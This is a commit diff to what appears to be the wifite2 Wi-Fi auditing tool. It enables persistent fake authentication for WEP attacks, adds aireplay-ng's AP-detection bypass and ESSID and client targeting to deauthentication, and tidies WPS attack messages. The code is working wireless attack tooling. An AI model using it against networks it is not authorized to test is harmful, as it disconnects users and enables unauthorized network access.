Enable persistent fakeauth, bypass AP detection when deauthing.
AP bypass should make 5ghz deauths work for all systems (should fix #24)
This commit is contained in:
derv82
@@ -85,7 +85,7 @@ class Aireplay(Thread):
|
|||||||
|
|
||||||
def stop(self):
|
def stop(self):
|
||||||
''' Stops aireplay process '''
|
''' Stops aireplay process '''
|
||||||
if self.pid and self.pid.poll() == None:
|
if hasattr(self, "pid") and self.pid and self.pid.poll() == None:
|
||||||
self.pid.interrupt()
|
self.pid.interrupt()
|
||||||
|
|
||||||
def get_output(self):
|
def get_output(self):
|
||||||
@@ -322,17 +322,20 @@ class Aireplay(Thread):
|
|||||||
return None
|
return None
|
||||||
|
|
||||||
@staticmethod
|
@staticmethod
|
||||||
def deauth(target_bssid, client_mac=None, num_deauths=1, timeout=2):
|
def deauth(target_bssid, essid=None, client_mac=None, num_deauths=1, timeout=2):
|
||||||
deauth_cmd = [
|
deauth_cmd = [
|
||||||
'aireplay-ng',
|
"aireplay-ng",
|
||||||
'-0', # Deauthentication
|
"-0", # Deauthentication
|
||||||
str(num_deauths),
|
str(num_deauths),
|
||||||
'--ignore-negative-one',
|
"--ignore-negative-one",
|
||||||
'-a', target_bssid # Target AP
|
"-a", target_bssid, # Target AP
|
||||||
|
"-D" # Skip AP detection
|
||||||
]
|
]
|
||||||
if client_mac is not None:
|
if client_mac is not None:
|
||||||
# Station-specific deauth
|
# Station-specific deauth
|
||||||
deauth_cmd.extend(['-c', client_mac])
|
deauth_cmd.extend(["-c", client_mac])
|
||||||
|
if essid:
|
||||||
|
deauth_cmd.extend(["-e", essid])
|
||||||
deauth_cmd.append(Configuration.interface)
|
deauth_cmd.append(Configuration.interface)
|
||||||
proc = Process(deauth_cmd)
|
proc = Process(deauth_cmd)
|
||||||
while proc.poll() is None:
|
while proc.poll() is None:
|
||||||
|
|||||||
@@ -57,7 +57,7 @@ class AttackWEP(Attack):
|
|||||||
# Use our interface's MAC address for the attacks.
|
# Use our interface's MAC address for the attacks.
|
||||||
client_mac = Interface.get_mac()
|
client_mac = Interface.get_mac()
|
||||||
# Keep us authenticated
|
# Keep us authenticated
|
||||||
#fakeauth_proc = Aireplay(self.target, "fakeauth")
|
fakeauth_proc = Aireplay(self.target, "fakeauth")
|
||||||
elif len(airodump_target.clients) == 0:
|
elif len(airodump_target.clients) == 0:
|
||||||
# Failed to fakeauth, can't use our MAC.
|
# Failed to fakeauth, can't use our MAC.
|
||||||
# And there are no associated clients. Use one and tell the user.
|
# And there are no associated clients. Use one and tell the user.
|
||||||
@@ -85,12 +85,11 @@ class AttackWEP(Attack):
|
|||||||
while True:
|
while True:
|
||||||
airodump_target = self.wait_for_target(airodump)
|
airodump_target = self.wait_for_target(airodump)
|
||||||
status = "%d/{C}%d{W} IVs" % (airodump_target.ivs, Configuration.wep_crack_at_ivs)
|
status = "%d/{C}%d{W} IVs" % (airodump_target.ivs, Configuration.wep_crack_at_ivs)
|
||||||
'''
|
if fakeauth_proc:
|
||||||
if fakeauth_proc and fakeauth_proc.status:
|
if fakeauth_proc and fakeauth_proc.status:
|
||||||
status += ", {G}fakeauth{W}"
|
status += ", {G}fakeauth{W}"
|
||||||
else:
|
else:
|
||||||
status += ", {R}no-auth{W}"
|
status += ", {R}no-auth{W}"
|
||||||
'''
|
|
||||||
if aireplay.status is not None:
|
if aireplay.status is not None:
|
||||||
status += ", %s" % aireplay.status
|
status += ", %s" % aireplay.status
|
||||||
Color.clear_entire_line()
|
Color.clear_entire_line()
|
||||||
@@ -224,6 +223,9 @@ class AttackWEP(Attack):
|
|||||||
if self.user_wants_to_stop(attack_name, attacks_remaining, airodump_target):
|
if self.user_wants_to_stop(attack_name, attacks_remaining, airodump_target):
|
||||||
self.success = False
|
self.success = False
|
||||||
return self.success
|
return self.success
|
||||||
|
except Exception as e:
|
||||||
|
Color.pl("\n{+} {R}Error: {O}%s{W}" % e)
|
||||||
|
continue
|
||||||
# End of big try-catch
|
# End of big try-catch
|
||||||
# End of for-each-attack-type loop
|
# End of for-each-attack-type loop
|
||||||
|
|
||||||
@@ -263,12 +265,13 @@ class AttackWEP(Attack):
|
|||||||
if answer == 1:
|
if answer == 1:
|
||||||
# Deauth clients & retry
|
# Deauth clients & retry
|
||||||
num_deauths = 1
|
num_deauths = 1
|
||||||
|
Color.clear_entire_line()
|
||||||
Color.p("\r{+} {O}Deauthenticating *broadcast*{W} (all clients)...")
|
Color.p("\r{+} {O}Deauthenticating *broadcast*{W} (all clients)...")
|
||||||
Aireplay.deauth(target.bssid)
|
Aireplay.deauth(target.bssid, essid=target.essid)
|
||||||
for client in target.clients:
|
for client in target.clients:
|
||||||
Color.clear_entire_line()
|
Color.clear_entire_line()
|
||||||
Color.p("\r{+} {O}Deauthenticating client {C}%s{W}..." % client.bssid)
|
Color.p("\r{+} {O}Deauthenticating client {C}%s{W}..." % client.station)
|
||||||
Aireplay.deauth(target.bssid)
|
Aireplay.deauth(target.bssid, client_mac=client.station, essid=target.essid)
|
||||||
num_deauths += 1
|
num_deauths += 1
|
||||||
Color.clear_entire_line()
|
Color.clear_entire_line()
|
||||||
Color.pl("\r{+} Sent {C}%d {O}deauths{W}" % num_deauths)
|
Color.pl("\r{+} Sent {C}%d {O}deauths{W}" % num_deauths)
|
||||||
|
|||||||
@@ -33,9 +33,7 @@ class AttackWPS(Attack):
|
|||||||
self.success = True
|
self.success = True
|
||||||
return self.success
|
return self.success
|
||||||
else:
|
else:
|
||||||
Color.pl(
|
Color.pl("{!} {R}your version of 'reaver' does not support the {O}WPS pixie-dust attack{W}")
|
||||||
'{!} {R}your version of "reaver" does not' +
|
|
||||||
' support the {O}WPS pixie-dust attack{W}')
|
|
||||||
|
|
||||||
if Configuration.pixie_only:
|
if Configuration.pixie_only:
|
||||||
Color.pl('\r{!} {O}--pixie{R} set, ignoring WPS-PIN attack{W}')
|
Color.pl('\r{!} {O}--pixie{R} set, ignoring WPS-PIN attack{W}')
|
||||||
|
|||||||
Reference in New Issue
Block a user